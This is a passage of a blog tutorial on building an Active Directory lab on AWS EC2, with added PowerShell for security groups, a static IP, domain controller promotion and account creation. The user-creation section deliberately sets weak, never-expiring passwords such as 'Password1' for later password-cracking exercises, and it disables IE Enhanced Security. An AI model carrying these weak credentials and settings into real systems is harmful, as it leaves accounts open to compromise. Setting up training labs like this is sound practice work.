<a href="https://2.bp.blogspot.com/-vpGmA71hofg/WQAfCV5kBGI/AAAAAAAABQE/0COkBiBW8QsGe_ldv5w5Wyxht4anBrmKwCEw/s1600/17%2B-%2Bdecrypt%2Bpassword.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="560" src="https://2.bp.blogspot.com/-vpGmA71hofg/WQAfCV5kBGI/AAAAAAAABQE/0COkBiBW8QsGe_ldv5w5Wyxht4anBrmKwCEw/s640/17%2B-%2Bdecrypt%2Bpassword.png" width="640" /></a></div>
<div>
<br />
19) Download the RDP file, and point the window to your private key so you can decrypt the random password AWS gave your Windows instance. Once you decrypt that password, save it somewhere safe, like in a password vault (e.g., KeePass, PasswordSafe). </div>
<div>
<br /></div>
<div>
20) Double click the AWS RDP file, or just put the public IP in RDP manually and choose Administrator as the username </div>
<div>
<br /></div>
<div>
21) Enter the decrypted password</div>
<div>
<br /></div>
<div>
22) You are now logged into your first server. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-ZnyZDU2sQLw/WQAfC--X9lI/AAAAAAAABQE/Nbx_AKiCfRsBnFGzN-ZFM-60T417MpqCQCEw/s1600/18%2B-%2Brdp%2Bworks.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="521" src="https://2.bp.blogspot.com/-ZnyZDU2sQLw/WQAfC--X9lI/AAAAAAAABQE/Nbx_AKiCfRsBnFGzN-ZFM-60T417MpqCQCEw/s640/18%2B-%2Brdp%2Bworks.png" width="640" /></a></div>
<div>
<br /></div>
<br />
<h3>
Instance #2: This will be Workstation01 </h3>
There is a really cool feature within the EC2 console called "Launch More Like This". This launches the EC2 instance wizard and uses the same EC2 settings as the selected instance, such as security groups, sizing preferences, desired subnet, etc. But this is NOT like cloning a VM: everything inside the new instance is going to be a vanilla install. <br />
<div>
<br /></div>
1) Go back to <b>EC2 dashboard</b> </div>
<div>
<br /></div>
<div>
2) Click on <b>Windows Server 2016-1</b> and click <b>Actions</b>, <b>Launch more like this</b>. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-rq37VWXKOoY/WQAfC6NBACI/AAAAAAAABQE/B9-1MtIEV_0XuBznc5f8XJXbje9IM1NigCEw/s1600/19%2B-%2Blaunch%2Bmore%2Blike%2Bthis.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://3.bp.blogspot.com/-rq37VWXKOoY/WQAfC6NBACI/AAAAAAAABQE/B9-1MtIEV_0XuBznc5f8XJXbje9IM1NigCEw/s400/19%2B-%2Blaunch%2Bmore%2Blike%2Bthis.png" width="400" /></a></div>
<div>
<br />
3) Click <b>Launch</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-orfcbCNz4eg/WQAfC55XqvI/AAAAAAAABQE/C2CDhKqQ2aQSUPHy5kKvfODNyqgzn9AqQCEw/s1600/20%2B-%2Blaunch%2Bagain.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="256" src="https://3.bp.blogspot.com/-orfcbCNz4eg/WQAfC55XqvI/AAAAAAAABQE/C2CDhKqQ2aQSUPHy5kKvfODNyqgzn9AqQCEw/s400/20%2B-%2Blaunch%2Bagain.png" width="400" /></a></div>
<div>
<br />
4) Select same keypair you created last time, and click <b>Launch Instances</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-GUF7Q5lgO5M/WQAfDKe8-II/AAAAAAAABQE/QxyC-l-CgSAs5pEXwWcqcpqHdEKLIiHsQCEw/s1600/21%2B-%2Blaunch%2B2nd%2Binstance.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="392" src="https://1.bp.blogspot.com/-GUF7Q5lgO5M/WQAfDKe8-II/AAAAAAAABQE/QxyC-l-CgSAs5pEXwWcqcpqHdEKLIiHsQCEw/s640/21%2B-%2Blaunch%2B2nd%2Binstance.png" width="640" /></a></div>
5) When it is fully running, download the RDP file again and decrypt the password</div>
<div>
<br />
<div>
<div>
6) Double click the AWS RDP file, or just put the public IP in RDP manually and choose Administrator as the username </div>
<div>
<br /></div>
<div>
7) Enter the decrypted password</div>
<div>
<br /></div>
<div>
8) You are now logged into your second machine</div>
</div>
<div>
<br /></div>
<h4>
Disable IE Enhanced Security Configuration</h4>
<div>
This will make IE act more like it does on Windows 10; specifically, it will not require you to add every new site to the Trusted Sites list. </div>
<div>
</div>
<div>
1) Open <b>Server Manager</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0QlIhiXyp3I/WQAfDB2ZtaI/AAAAAAAABQE/Su0Vo8ZJwa0G8AWg4UhIzx-LP-rfXycJgCEw/s1600/22%2B-%2Bdc01%2B-%2Blaunch%2Bserver%2Bmanager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="318" src="https://2.bp.blogspot.com/-0QlIhiXyp3I/WQAfDB2ZtaI/AAAAAAAABQE/Su0Vo8ZJwa0G8AWg4UhIzx-LP-rfXycJgCEw/s320/22%2B-%2Bdc01%2B-%2Blaunch%2Bserver%2Bmanager.png" width="320" /></a></div>
<div>
<br /></div>
<div>
2) Click <b>Local Server</b></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
3) In <b>Properties</b>, navigate to <b>IE Enhanced Security Configuration</b>, and click <b>On</b></div>
<div>
<br /></div>
<div>
<br /></div>
<div>
4) Change both options to <b>Off</b>, and click <b>OK</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-8Em5M1Ol4HI/WQfTIYGBQHI/AAAAAAAABSw/AKoTMrHjKks5QOVyPP5UEgNAfoeqjRaMgCLcB/s1600/33.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="536" src="https://3.bp.blogspot.com/-8Em5M1Ol4HI/WQfTIYGBQHI/AAAAAAAABSw/AKoTMrHjKks5QOVyPP5UEgNAfoeqjRaMgCLcB/s640/33.png" width="640" /></a></div>
<div>
<br /></div>
<div>
5) Restart IE</div>
<div>
<br /></div>
<h3>
Instances #3 & #4?</h3>
<div>
You can either stop here and you'll have:</div>
<div>
<br /></div>
<div>
WindowsServer2016-1 - This will be your DC</div>
<div>
WindowsServer2016-2 - This will be your workstation</div>
<div>
<br /></div>
<div>
Or, you can make two more servers and you will have: </div>
<div>
<br /></div>
<div>
<div>
WindowsServer2016-1 - This will be your DC</div>
<div>
WindowsServer2016-2 - This will be user 1's workstation</div>
</div>
<div>
WindowsServer2016-3 - This will be server1</div>
<div>
<div>
WindowsServer2016-4 - This will be user 2's workstation</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
<h3>
Create security groups so your LAN can talk to each other</h3>
Now that we have spun up all of our servers and have successfully RDP'd to each of them, there is one more thing we need to do before we can create our domain. We need to create an AWS Security Group that allows the hosts on your subnet to talk to each other. </div>
<div>
<br />
<div>
1) On the left navigation bar under <b>Network & Security</b>, select <b>Security Groups</b>, Click <b>Create Security Group</b></div>
<div>
<br /></div>
<div>
2) Name it and allow all inbound traffic from your subnet. You can leave the <b>Outbound</b> tab as is; the default is to allow all outbound traffic. </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-f2V60pGjXOo/WQfuWHvuSkI/AAAAAAAABUE/gZJ_cOmH3FYlnQlECyaC31rWt_omQcfBQCLcB/s1600/37.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="316" src="https://2.bp.blogspot.com/-f2V60pGjXOo/WQfuWHvuSkI/AAAAAAAABUE/gZJ_cOmH3FYlnQlECyaC31rWt_omQcfBQCLcB/s640/37.png" width="640" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
3) Click <b>Create</b></div>
<div>
<br /></div>
<div>
4) Now we need to apply this security group to all of our Lab instances</div>
<div>
<br /></div>
<div>
5) Go to the <b>EC2</b> view, click <b>Actions</b>, navigate to <b>Networking</b>, and select <b>Change Security Groups</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-8pUyrYlbMS8/WQfY2bdeldI/AAAAAAAABTY/kDs8BZNXezIrtF-Xpmcpdp1tnjKZ6WfswCLcB/s1600/35.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="https://4.bp.blogspot.com/-8pUyrYlbMS8/WQfY2bdeldI/AAAAAAAABTY/kDs8BZNXezIrtF-Xpmcpdp1tnjKZ6WfswCLcB/s640/35.png" width="640" /></a></div>
<div>
<br /></div>
<div>
<div>
6) Select the new security group <i>*in addition*</i> to the RDP security group you already have selected</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-7oIc4qdWNzo/WQfY2Sx1daI/AAAAAAAABTU/CGVhsuyN85YtOSmonapDumjKcS9_voODQCEw/s1600/36.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="344" src="https://2.bp.blogspot.com/-7oIc4qdWNzo/WQfY2Sx1daI/AAAAAAAABTU/CGVhsuyN85YtOSmonapDumjKcS9_voODQCEw/s640/36.png" width="640" /></a></div>
<div>
<br /></div>
<div>
7) Click <b>Assign Security Groups</b></div>
<div>
<br /></div>
<div>
8) Repeat this for ALL Lab instances</div>
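<div>
<br /></div>
<div>
The same two security groups, built with the AWS CLI from PowerShell and attached to every lab instance at once; this is an added example, not from the original post. It assumes the AWS CLI is installed and configured, that each lab instance carries a constructed tag <b>Lab=pentest-lab</b>, and that the subnet CIDR can be read from the first of them. If you kept the RDP group the launch wizard created, put its ID in $rdpSg instead of creating a new one.</div>

```powershell
# Added example (not from the original post): the security-group steps above done
# with the AWS CLI from PowerShell. Builds one narrow RDP group and one lab-LAN
# group and attaches BOTH to every lab instance. Assumption: lab instances are
# tagged Lab=pentest-lab (constructed); every ID comes from your own account.
$labTag = 'pentest-lab'
$filter = "Name=tag:Lab,Values=$labTag"

# Discover the VPC and subnet from an existing lab instance instead of typing IDs.
$first = aws ec2 describe-instances --filters $filter `
             --query 'Reservations[0].Instances[0].[VpcId,SubnetId]' --output text
$vpcId, $subnetId = $first -split '\s+'
$labCidr = aws ec2 describe-subnets --subnet-ids $subnetId --query 'Subnets[0].CidrBlock' --output text

# Your current public address, so the RDP rule is a /32 and never 0.0.0.0/0.
$myIp = (Invoke-RestMethod -Uri 'https://checkip.amazonaws.com').Trim()

# Group 1: RDP only from your address. Re-run the authorize line (after revoking
# the old one) when your ISP address changes, rather than widening the rule.
$rdpSg = aws ec2 create-security-group --group-name lab-rdp --description 'RDP from my address only' `
             --vpc-id $vpcId --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id $rdpSg --protocol tcp --port 3389 --cidr "$myIp/32"

# Group 2: all traffic between lab hosts, but only from the lab subnet itself
# (the CLI maps "all" to protocol -1 in the API).
$lanSg = aws ec2 create-security-group --group-name lab-lan --description 'All traffic from the lab subnet' `
             --vpc-id $vpcId --query GroupId --output text
aws ec2 authorize-security-group-ingress --group-id $lanSg --protocol all --cidr $labCidr

# Attach both groups to every lab instance. modify-instance-attribute REPLACES the
# instance's group list, which is why the RDP group is passed again ("in addition").
$ids = aws ec2 describe-instances --filters $filter --query 'Reservations[].Instances[].InstanceId' --output text
foreach ($id in ($ids -split '\s+' | Where-Object { $_ })) {
    aws ec2 modify-instance-attribute --instance-id $id --groups $rdpSg $lanSg
    "$id -> $rdpSg $lanSg"
}

# Check the result: each instance should list exactly these two groups.
aws ec2 describe-instances --filters $filter `
    --query 'Reservations[].Instances[].[InstanceId,SecurityGroups[].GroupName]' --output text
```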
<h2>
Creating the Domain</h2>
<div>
<br /></div>
<div>
<h3>
Setting up WindowsServer2016-1 to be a Domain Controller</h3>
<div>
There are a few things you'll need to do and some you might want to do before creating your domain and promoting your first server to a domain controller. </div>
<div>
<br /></div>
<h4>
Configure a Static IP (Required)</h4>
<div>
The first thing you want to do is change your private IP from dynamic to static. The private IP address that AWS gives your instance "remains associated with the network interface when the instance is stopped and restarted, and is released when the instance is terminated." So while this address will not change, it is still dynamic as far as your instance is concerned, and will not pass a "promotion to DC" prerequisite check in Server 2016. There might be a better way to do this, but for me, all I did was configure the instance with a static address and I used the AWS assigned dynamic address as the IP address. </div>
<div>
<br /></div>
<div>
1) If you are new to Server 2012/2016, you get to this by right clicking on the networking icon at the bottom left and clicking <i><b>Open Network and Sharing Center</b></i></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-lXwVAMM2Z2I/WQAlbRiKpkI/AAAAAAAABQc/2mI4I7zSmgwfbGmcplc4ITXEI5_7o5dLwCEw/s1600/27%2B-%2Bupdate%2Bnetwork.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://3.bp.blogspot.com/-lXwVAMM2Z2I/WQAlbRiKpkI/AAAAAAAABQc/2mI4I7zSmgwfbGmcplc4ITXEI5_7o5dLwCEw/s1600/27%2B-%2Bupdate%2Bnetwork.png" /></a></div>
<div>
<i><br /></i>2) Click the Ethernet adapter</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://1.bp.blogspot.com/-rjv4l1xv2ew/WQAmDcedteI/AAAAAAAABQk/ydotc8syss0ToRnhyJG-IUjCR3GrVVbTQCLcB/s1600/28%2Bethernet.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://1.bp.blogspot.com/-rjv4l1xv2ew/WQAmDcedteI/AAAAAAAABQk/ydotc8syss0ToRnhyJG-IUjCR3GrVVbTQCLcB/s320/28%2Bethernet.png" width="320" /></a></div>
<div>
<br />
<br />
3) Use PowerShell to find the current IP, netmask, and gateway. Set the static configuration to match.</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0-WrQth1aIg/WQAnQji1CdI/AAAAAAAABQw/y1N_mc2eqNEKvA1h9gPSwnIWlbcFRGfGgCLcB/s1600/29%2B-%2Bnetwork%2Bconfig.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="214" src="https://2.bp.blogspot.com/-0-WrQth1aIg/WQAnQji1CdI/AAAAAAAABQw/y1N_mc2eqNEKvA1h9gPSwnIWlbcFRGfGgCLcB/s640/29%2B-%2Bnetwork%2Bconfig.png" width="640" /></a></div>
<div>
</div>
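<div>
Here is the same change done from PowerShell, as an added example that is not part of the original post. It reads the DHCP-assigned address, prefix length, gateway and DNS servers from the adapter and re-applies those exact values as a static configuration, which is what the "promotion to DC" prerequisite check wants to see. The adapter alias <b>Ethernet</b> and an elevated session are assumptions; confirm the alias with <b>Get-NetAdapter</b> first.</div>

```powershell
# Added example, not from the original post. Reads the DHCP-assigned settings
# on the instance's adapter and re-applies the same address, prefix and gateway
# as a static configuration so the AD DS prerequisite check passes.
# Assumptions: the adapter alias is "Ethernet" (check with Get-NetAdapter) and
# this runs in an elevated PowerShell session.

$alias = "Ethernet"

# Capture what AWS handed out via DHCP
$cfg    = Get-NetIPConfiguration -InterfaceAlias $alias
$ip     = $cfg.IPv4Address.IPAddress
$prefix = $cfg.IPv4Address.PrefixLength     # e.g. 24 for a 255.255.255.0 netmask
$gw     = $cfg.IPv4DefaultGateway.NextHop
# AddressFamily 2 is IPv4; keep the VPC resolver AWS already gave us
$dns    = ($cfg.DNSServer | Where-Object { $_.AddressFamily -eq 2 }).ServerAddresses

Write-Host "Current DHCP lease: $ip/$prefix via $gw, DNS $($dns -join ', ')"

# Turn off DHCP on the interface, drop the leased address and default route,
# then put the identical values back as static settings.
Set-NetIPInterface  -InterfaceAlias $alias -AddressFamily IPv4 -Dhcp Disabled
Remove-NetIPAddress -InterfaceAlias $alias -AddressFamily IPv4 -Confirm:$false
Remove-NetRoute     -InterfaceAlias $alias -AddressFamily IPv4 -DestinationPrefix "0.0.0.0/0" -Confirm:$false
New-NetIPAddress    -InterfaceAlias $alias -IPAddress $ip -PrefixLength $prefix -DefaultGateway $gw | Out-Null
Set-DnsClientServerAddress -InterfaceAlias $alias -ServerAddresses $dns

# Confirm the adapter now reports a static (PrefixOrigin Manual, Dhcp Disabled) IPv4 address
Get-NetIPInterface -InterfaceAlias $alias -AddressFamily IPv4 | Select-Object InterfaceAlias, Dhcp
Get-NetIPAddress   -InterfaceAlias $alias -AddressFamily IPv4 | Select-Object IPAddress, PrefixLength, PrefixOrigin
```

<div>
Paste the whole script in one go rather than line by line: between the Remove-NetIPAddress and New-NetIPAddress calls the adapter has no address, so an RDP session drops for a moment and reconnects once the same address is back. The last two lines should show <b>Dhcp: Disabled</b> and <b>PrefixOrigin: Manual</b>, which is the state the DC prerequisite check accepts.</div>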
<h4>
Change the Hostname (Optional)</h4>
<div>
The next thing you might want to do, and this is optional, is to change the hostname to something like AWS-DC01. </div>
<div>
<br /></div>
<div>
1) If you are new to Server 2012/2016, click the folder icon in the task bar, right click <b>This PC</b>, and click <b>properties</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-YRC-wweV0tQ/WQAoAZsdzPI/AAAAAAAABQ4/M9YEy9PQCjkdaNXgvvsb-zChmOC3xndoQCLcB/s1600/30%2B-%2Bchange%2Bhostname.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="460" src="https://4.bp.blogspot.com/-YRC-wweV0tQ/WQAoAZsdzPI/AAAAAAAABQ4/M9YEy9PQCjkdaNXgvvsb-zChmOC3xndoQCLcB/s640/30%2B-%2Bchange%2Bhostname.png" width="640" /></a></div>
<div>
<br />
2) The rest should be familiar:</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-Qd9xFomq3o4/WQAo1z69CrI/AAAAAAAABRQ/XkXbvCo3CAI8e8o0fQtdA4Q9yTn8YlocgCLcB/s1600/31%2Bchange%2Bhostname.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="614" src="https://2.bp.blogspot.com/-Qd9xFomq3o4/WQAo1z69CrI/AAAAAAAABRQ/XkXbvCo3CAI8e8o0fQtdA4Q9yTn8YlocgCLcB/s640/31%2Bchange%2Bhostname.png" width="640" /></a></div>
<div>
<br /></div>
<div>
3) You will have to reboot at this point. Give it a few minutes and log back in. </div>
<div>
<br /></div>
<h4>
Promote the server to a Domain Controller</h4>
<div>
Now let's finally make it a DC. </div>
<div>
<br /></div>
<div>
1) Open <b>Server Manager</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://2.bp.blogspot.com/-0QlIhiXyp3I/WQAfDB2ZtaI/AAAAAAAABQE/Su0Vo8ZJwa0G8AWg4UhIzx-LP-rfXycJgCEw/s1600/22%2B-%2Bdc01%2B-%2Blaunch%2Bserver%2Bmanager.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="397" src="https://2.bp.blogspot.com/-0QlIhiXyp3I/WQAfDB2ZtaI/AAAAAAAABQE/Su0Vo8ZJwa0G8AWg4UhIzx-LP-rfXycJgCEw/s400/22%2B-%2Bdc01%2B-%2Blaunch%2Bserver%2Bmanager.png" width="400" /></a></div>
<div>
<br /></div>
<div>
2) Click <b>Manage</b>, <b>Add Roles and Features</b> </div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://3.bp.blogspot.com/-lEeTxcdr8EQ/WQAfDFWgbjI/AAAAAAAABQE/xXTSERFGEuEcdNLiBq0eCMxDfIkJc3DdACEw/s1600/23-%2Bdc01%2B-%2Badd%2Broles%2Band%2Bfeatures.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://3.bp.blogspot.com/-lEeTxcdr8EQ/WQAfDFWgbjI/AAAAAAAABQE/xXTSERFGEuEcdNLiBq0eCMxDfIkJc3DdACEw/s400/23-%2Bdc01%2B-%2Badd%2Broles%2Band%2Bfeatures.png" width="400" /></a></div>
<div>
<br />
3) <b>Next, Next, Next </b></div>
<div>
<br /></div>
<div>
4) Select <b>Active Directory Domain Services</b>, then click <b>Add Features </b></div>
<div>
<br /></div>
<div>
5) Select <b>DNS Server</b>, then click <b>Add Features</b><i> </i></div>
<div>
<i><br /></i></div>
<div>
6) <b>Next, Next, Next, Install, Close</b> </div>
<div>
<br /></div>
<div>
7) In <b>Server Manager</b>, click the yellow triangle and click <b>Promote this server to a domain controller</b></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://4.bp.blogspot.com/-nQZPPHnfyRo/WQAfDR2LsGI/AAAAAAAABQE/VdFM_IMHKzg1ATybEUGLOwBNKGTnR4E1QCEw/s1600/25%2B-%2Bpromote%2Bto%2Bdc.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="231" src="https://4.bp.blogspot.com/-nQZPPHnfyRo/WQAfDR2LsGI/AAAAAAAABQE/VdFM_IMHKzg1ATybEUGLOwBNKGTnR4E1QCEw/s400/25%2B-%2Bpromote%2Bto%2Bdc.png" width="400" /></a></div>
<div>
<br />
8) In the wizard, select <i><b>Add new forest</b>,</i> and give it a root domain name: aws.local </div>
<div>
<br /></div>
<div>
9) Give it a restore password and drop that in your password manager</div>
<div>
<br /></div>
<div>
10) <b>Next, Next, Next, Next, Next, Install </b></div>
<div>
<br /></div>
<div>
11) When it is done, click <b>close</b> (or just wait and it will reboot) </div>
<div>
<br /></div>
<div>
12) Give it a minute and connect back. Once you connect, it will take a few minutes to fully install. </div>
<div>
<br /></div>
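<div>
The following PowerShell is an added example (not from the original post) that performs steps 2 through 11 without Server Manager, with the optional hostname change folded in as a first phase: it installs the AD DS and DNS roles, runs the prerequisite check that the static-IP step satisfies, and creates the aws.local forest. The NetBIOS name AWS and the hostname AWS-DC01 are assumptions that follow the post's naming; the restore (DSRM) password is prompted for rather than written into the script.</div>

```powershell
# Added example, not from the original post: the hostname change, role install
# and forest promotion that the post does through Server Manager, run from an
# elevated PowerShell session on the future DC. Assumptions: root domain
# aws.local (from the post), NetBIOS name AWS and hostname AWS-DC01 (the post's
# suggested name). The DSRM "restore password" is prompted for, never hard-coded.

# Optional first phase: rename the server. This restarts it, so log back in
# and run Invoke-LabDcPromotion afterwards.
function Invoke-LabDcRename {
    Rename-Computer -NewName "AWS-DC01" -Restart -Force
}

# Second phase: install the roles, run the prerequisite check (this is where a
# DHCP-assigned address fails), then build the forest. Reboots on completion.
function Invoke-LabDcPromotion {
    Install-WindowsFeature -Name AD-Domain-Services, DNS -IncludeManagementTools | Out-Null

    # The wizard's "restore password" is the Directory Services Restore Mode password
    $dsrm = Read-Host -Prompt "DSRM (restore) password" -AsSecureString

    $params = @{
        DomainName                    = "aws.local"
        DomainNetbiosName             = "AWS"
        InstallDns                    = $true
        SafeModeAdministratorPassword = $dsrm
    }

    $check = Test-ADDSForestInstallation @params
    if ($check.Status -ne "Success") {
        Write-Warning "Prerequisite check failed: $($check.Message)"
        return
    }

    Install-ADDSForest @params -Force
}

# After the post-promotion reboot, confirm the domain and its DNS zone exist:
#   Get-ADDomain aws.local | Select-Object DNSRoot, DomainMode
#   Get-DnsServerZone      | Select-Object ZoneName, ZoneType
```

<div>
Run <b>Invoke-LabDcRename</b> only if you want the new hostname (it reboots), then <b>Invoke-LabDcPromotion</b> after logging back in. Test-ADDSForestInstallation is the same check the wizard runs behind the scenes, so a leftover DHCP address shows up here as a warning before anything is changed.</div>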
</div>
<div>
<br /></div>
<div>
<h3>
You now have an Active Directory Domain - Add some users</h3>
</div>
<div>
<br /></div>
<div>
I'm going to walk you through adding a bunch of users, and how to make one of those users a domain administrator. I am not going to cover setting up OUs in this post. If you are interested in doing that now, take a look at this awesome post from Jared Haight: <a href="https://www.psattack.com/articles/20160718/setting-up-an-active-directory-lab-part-3/">Setting up an Active Directory Lab - Part 3</a></div>
<div>
<br /></div>
<div>
<div>
1) Within <b>server manager</b>, click <b>tools</b> at the top right and select <b>active directory users and computers</b></div>
<div>
<br /></div>
<div>
2) Double click on your domain to expand it (either on the left or the right frame)</div>
<div>
<br /></div>
<div>
3) Right click on<b> users</b> and add <b>New</b> > <b>User</b></div>
<div>
<br /></div>
<div>
4) Name your users however you want, but I like to keep it simple:<br />
<ul>
<li>First: <b>User</b></li>
<li>Last: <b>1</b></li>
<li>Login name: <b>user1</b></li>
<li>Click <b>Next</b></li>
<li>Enter an easy to crack password</li>
<li>Uncheck <b>user must change at next login</b></li>
<li>Check <b>password never expires</b></li>
<li>Next</li>
<li>Finish</li>
</ul>
5) Repeat for user2 and admin1<br />
<h3>
Add at least one admin user to your domain admins group</h3>
</div>
<div>
1) Within <b>Active Directory Users and Computers</b>, double-click <b>Domain Admins</b></div>
<div>
<i><br /></i></div>
<div>
2) Click <b>Members</b></div>
<div>
<i><br /></i></div>
<div>
3) Click <b>Add</b></div>
<div>
<br /></div>
<div>
4) Start typing a username of your admin user and click <b>check names</b></div>
<div>
<br /></div>
<div>
5) Click <b>OK, OK</b></div>
<div>
<br /></div>
<div>
<div>
<br /></div>
</div>
</div>
</div>
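<div>
As an added example that is not part of the original post, the same three accounts and the Domain Admins membership can be created with the ActiveDirectory module. It sets the two checkboxes the post mentions (no password change at next logon, password never expires), puts the accounts in the default Users container like the GUI does, and ends with a verification query. The domain aws.local comes from the post; the passwords are constructed lab-only values.</div>

```powershell
# Added example, not from the original post: creates the post's three lab
# accounts (user1, user2, admin1) in the default Users container with the same
# options the wizard sets, then adds admin1 to Domain Admins. Run on the DC as a
# domain admin. Assumptions: domain aws.local from the post; the passwords are
# constructed lab-only values (the post deliberately uses weak ones, but they
# still have to satisfy the default domain complexity policy).
Import-Module ActiveDirectory

$labUsers = @(
    @{ Sam = "user1";  Given = "User";  Sur = "1"; Password = "Password1" },
    @{ Sam = "user2";  Given = "User";  Sur = "2"; Password = "Password2" },
    @{ Sam = "admin1"; Given = "Admin"; Sur = "1"; Password = "Password3" }
)

foreach ($u in $labUsers) {
    if (Get-ADUser -Filter "SamAccountName -eq '$($u.Sam)'") {
        Write-Host "$($u.Sam) already exists, skipping"
        continue
    }
    # -ChangePasswordAtLogon $false  = "User must change password at next logon" unchecked
    # -PasswordNeverExpires  $true   = "Password never expires" checked
    New-ADUser `
        -Name "$($u.Given) $($u.Sur)" `
        -GivenName $u.Given -Surname $u.Sur `
        -SamAccountName $u.Sam `
        -UserPrincipalName "$($u.Sam)@aws.local" `
        -AccountPassword (ConvertTo-SecureString $u.Password -AsPlainText -Force) `
        -ChangePasswordAtLogon $false `
        -PasswordNeverExpires $true `
        -Enabled $true
}

# Make admin1 a domain admin (the Members > Add > Check Names > OK steps)
Add-ADGroupMember -Identity "Domain Admins" -Members "admin1"

# Verify: the three accounts with their flags, and the Domain Admins membership
Get-ADUser -Filter "SamAccountName -like 'user*' -or SamAccountName -eq 'admin1'" `
    -Properties PasswordNeverExpires |
    Select-Object SamAccountName, Enabled, PasswordNeverExpires
Get-ADGroupMember -Identity "Domain Admins" | Select-Object SamAccountName
```

<div>
The script is safe to re-run: existing accounts are skipped, and Add-ADGroupMember is a no-op for a user who is already a member. Keep the weak passwords confined to this isolated lab; they are there so the later cracking exercises have something to find.</div>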
<h3>
The Homestretch - Add all hosts to the domain</h3>
<h4>
<div style="font-weight: normal;">
<br /></div>
<div>
Configure DNS</div>
</h4>
<div>
To add a machine to the domain, the one thing you NEED to do is set the domain controller as the primary DNS server. </div>
<div>
<br /></div>
<div>
1) RDP to server</div>
<div>
<br /></div>
<div>
2) Right click on the networking icon at the bottom left and click <b>Open Network and Sharing Center</b></div>
<div>
<i><br /></i></div>
<div>
3) Select <b>Ethernet</b> Adapter</div>
<div>
<br /></div>
<div>
4) Change the primary DNS server to be the IP address of your DC</div>
<div>
<br /></div>
<div>
<br /></div>
<h4>
Add host to the domain</h4>
<div>
While this process is fairly straightforward, I feel like it never works the first time for me. If you run into issues, read the notes right after these steps for ideas.</div>
<div>
<br /></div>
<div>
1) Select the folder icon in the task bar</div>
<div>
<br /></div>
<div>
2) Right click <b>This PC</b></div>
<div>
<br /></div>
<div>
3) Click <b>Properties</b></div>
<div>
<br /></div>
<div>
4) Under <b>Computer name, domain, and workgroup settings</b>, click <b>Change settings</b></div>
<div>
<br /></div>
<div>
5) Click <b>Change</b></div>
<div>
<br /></div>
<div>
6) Give your machine a better hostname: Workstation01 </div>
<div>
<br /></div>
<div>
7) Switch from <b>Workgroup</b> to <b>Domain</b> and specify the domain. For example, aws.local</div>
<div>
<br /></div>
<div>
8) Click <b>OK</b></div>
<div>
<br /></div>
<div>
9) Enter Domain Admin credentials. Go ahead and use Admin1's credentials.</div>
<div>
<br /></div>
<div>
10) Once your machine has been added, click <b>OK</b> twice</div>
<div>
<br /></div>
<div>
11) Close the window, and go ahead and <b>Restart Now</b></div>
<div>
<br /></div>
<div>
12) Repeat this for all servers</div>
<div>
<br /></div>
<div>
Having trouble adding your host to the domain? Here are some troubleshooting tips:</div>
<div>
<br /></div>
1) Can you ping the IP address of your DC from your other server(s)?<br />
2) Can you resolve the hostname of your DC from your other server(s)?<br />
3) Can you navigate to \\IP_ADDRESS_OF_DC from your other server(s)?<br />
<br />
Here are things to look for: <br />
<br />
AWS Security Groups - Make sure you didn't mess up your security group. <br />
--- Did you choose All TCP instead of All traffic? <br />
--- Did you use the wrong subnet mask for your source (or use the wrong subnet altogether)?</div>
<div>
Network Config Settings<br />
--- Did you give your DC the right subnet mask when you configured the static IP?<br />
--- Did you configure the primary DNS server properly on your non-DC host?</div>
<div>
Are you typing in the right domain name when attempting to add your host? <br />
<div>
<br /></div>
<h4>
Add domain users to the remote desktop group</h4>
<div>
<div>
1) Select the folder icon in the task bar</div>
<div>
<br /></div>
<div>
2) Right click <b>This PC</b></div>
<div>
